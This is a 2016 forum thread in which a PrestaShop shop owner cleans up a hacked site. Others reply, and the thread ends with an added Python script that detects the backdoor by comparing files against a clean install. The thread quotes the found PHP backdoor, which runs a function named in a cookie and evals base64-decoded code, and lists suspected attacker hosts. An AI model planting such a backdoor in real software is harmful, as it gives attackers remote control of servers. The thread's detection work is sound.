codochi, posted July 2, 2016:

Hello, I'm using the Warehouse theme and applied all the hotfixes from the author. Then I uninstalled modules such as simpleslideshow, homepageadvertise, homepageadvertise2, productpageadverts, columnadverts, ... But the virus re-creates robots.txt with this content:

User-Agent: *
Sitemap: http://mysite.com/sitemap.xml

and auto-generates sitemap.xml (> 1.9 MB):

<url>
<loc>http://mysite.com/Shadow-of-the-Seventh-Moon.pdf</loc>
</url>
<url>
<loc>http://mysite.com/Universal-Access-In-Hci--Towards-An-Information-Society-For-All.pdf</loc>
</url>

Every time the virus acts, this page appears after I log in: [image]

When I change an order's status, a blank page (505 error) appears, but the order was changed. When I delete robots.txt and sitemap.xml, the website is OK. I contacted the theme's author, but he said that he logged in fine. I removed all cookies and tried again, but it still fails unless I delete the two files. Please help me with how to scan the files. I'm using an unmanaged VPS.
codochi (author), posted July 2, 2016 (edited):

mysite.com/admin283/index.php?controller=AdminLogin&token=aaa5588487391244424b4ea7341f7e83&redirect=AdminMeta, with picture: [image]
malcek, posted July 2, 2016:

We also have this infestation, and it cost us a lot of money to clean up the mess, because the infestation spread through all the domains we have on the VPS. If you do not have an IT specialist to clean up that hack, then you can lose all your data. If you want proper help, send me a PM and I'll give you the contact of the guy who helped me with this, cleaned up the infestation and set up additional security modules at the server level. The problem is that they overwrote some PrestaShop files with their own code and put some additional files on the server in different folders. My suggestion is that you hire professional help.

Martin
codochi (author), posted July 2, 2016:

Hello, I think these are helpful commands that I googled. I deleted and replaced everything. After using the second command, I found all the virus files.

Find common backdoors:

grep -ri "eval" [path]
grep -ri "base64_decode" [path]

Find recently modified files:

find -type f -ctime -1 | more

The -type option looks for files, and -ctime restricts your scan to the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

Find PHP files in uploads (for WordPress):

find uploads -name "*.php" -print

Written by Derry Birkett
codochi (author), posted July 3, 2016:

Bonus: after using this command:

grep -ri "base64_decode" [path]

I found some encrypted code, then compared it with the original PS code and deleted it. Customers can visit the front page and check their orders, but they cannot order products because of bugs. I set permission 444 on robots.txt, and root/log/20160704_exception.log appears with:

*ERROR* 2016/07/04 - 01:24:11: Shop not found at line 404 in file classes/shop/Shop.php

I checked the encrypted code, and the fking guy spammed >.< from this file:

<?php
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
$code=base64_decode("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");
eval("return eval(\"$code\");")
?>

https://myip.ms/info/whois/5.104.111.33/k/2622665146/website/extra-rx-shop.name

And the fking guy: https://myip.ms/info/whois/80.87.205.79/k/2832378601/website/lboxaiu.in

Remember to check your root folder, such as /home/username/. I hope this is helpful for everyone (I don't have enough money to hire a professional IT person; 1 EUR = 24,844 VND). Sorry for my bad English.
indus, posted July 10, 2016:

I compared the files with the original PrestaShop folder I downloaded, and there is a lot of base64 code in the original as well.
malcek, posted July 10, 2016:

This base64 is not related to this infestation, because it is also included in a clean installation of PrestaShop. Please specify in more detail how this is related to the infestation.
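Pulling the thread's checks together as a defender's script (an added example, not code from the thread, from PrestaShop or from the Warehouse theme): it walks a web root, skips .php files that are byte-identical to the same path in an unpacked clean PrestaShop download, reports files the clean copy does not have at all, and pattern-matches only the changed files for the two constructs in the backdoor codochi posted. That comparison step is what keeps the stock base64_decode() calls indus and malcek mention out of the results. The sample shop tree and the regexes are constructed for the demo; the payload string is a placeholder.

```python
import re
import tempfile
from pathlib import Path

# Signatures constructed from the backdoor quoted above: a function name taken
# from a request cookie and called, and eval() fed by base64_decode(). Not exhaustive.
SUSPICIOUS = {
    "superglobal called as function": re.compile(
        r'\$_(?:COOKIE|GET|POST|REQUEST)\s*\[[^\]]+\]\s*\('),
    "eval of base64_decode": re.compile(
        r'eval\s*\(\s*(?:"return eval|base64_decode\s*\()'),
}

def scan_tree(webroot, clean_root):
    """Return sorted (relative path, reason) pairs for .php files under webroot
    that are extra, or changed relative to clean_root and match a signature."""
    webroot, clean_root = Path(webroot), Path(clean_root)
    findings = []
    for path in webroot.rglob("*.php"):
        rel = path.relative_to(webroot).as_posix()
        ref = clean_root / rel
        if not ref.is_file():
            findings.append((rel, "not present in clean install"))
            continue
        if ref.read_bytes() == path.read_bytes():
            continue  # unchanged stock file, whatever it contains
        text = path.read_text(errors="replace")
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(text):
                findings.append((rel, reason))
                break
    return sorted(findings)

def build_demo():
    """Constructed sample: stock file with a legitimate base64_decode() in both
    copies, index.php prepended with the cookie backdoor, and one dropped file."""
    base = Path(tempfile.mkdtemp())
    clean, live = base / "clean", base / "live"
    stock = '<?php $pixel = base64_decode("R0lGODlh"); // legitimate stock code\n'
    backdoor = ('<?php if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);\n'
                '$code=base64_decode("PAYLOAD_PLACEHOLDER"); eval("return eval(\\"$code\\");") ?>\n')
    for root in (clean, live):
        (root / "classes").mkdir(parents=True)
        (root / "classes" / "Tools.php").write_text(stock)
        (root / "index.php").write_text("<?php require 'config/config.inc.php';\n")
    (live / "index.php").write_text(backdoor + (clean / "index.php").read_text())
    (live / "img").mkdir()
    (live / "img" / "cache.php").write_text("<?php /* dropped file; content irrelevant */\n")
    return live, clean
```

Running `scan_tree(*build_demo())` lists img/cache.php as an extra file and index.php for the cookie construct, while the stock Tools.php with its base64_decode() never appears. Point it at a real web root and an unpacked clean PrestaShop of the same version to reproduce codochi's comparison without the grep false positives.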